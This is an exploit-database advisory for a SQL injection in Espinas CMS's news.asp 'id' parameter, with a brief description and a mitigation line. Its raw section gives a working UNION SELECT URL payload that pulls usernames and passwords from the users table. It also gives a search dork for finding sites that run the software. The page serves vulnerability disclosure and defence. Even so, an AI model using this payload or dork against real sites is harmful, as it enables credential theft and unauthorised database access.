Espinas CMS Sql Injection Vulnerability

vendor:

Espinas CMS

by:

Pouya Daneshmand

6,5

CVSS

MEDIUM

Sql Injection

CWE

Product Name: Espinas CMS

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2020

Espinas CMS Sql Injection Vulnerability

A SQL injection vulnerability exists in Espinas CMS, which allows an attacker to execute arbitrary SQL commands on the underlying database. The vulnerability is due to insufficient sanitization of user-supplied input in the 'id' parameter of the 'news.asp' page. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing malicious SQL commands to the vulnerable page. This can allow the attacker to gain access to sensitive information stored in the database, such as usernames and passwords.

Mitigation:

Input validation should be used to ensure that user-supplied input is properly sanitized before being used in SQL queries.

Source

Exploit-DB raw data:

#################################################################
# Securitylab.ir
#################################################################
# Application Info:
# Name: Espinas CMS
# Vendor: http://espinas.ir
#################################################################
# Vulnerability Info:
# Type: Sql Injection
# Risk: Medium
# Dork: "Powered by Espinas IT"
#################################################################
Vulnerability:
http://site.ir/news.asp?id=-1+union+select+1,concat(username,0x3a,0x3a,password),3,4,5+from+sinabed_users
--------------------------------------------------------------

#################################################################
# Discoverd By: Pouya Daneshmand
# Website: http://Pouya.Securitylab.ir
# Contacts: admin[at]securitylab.ir & whh_iran[AT]yahoo.com
###################################################################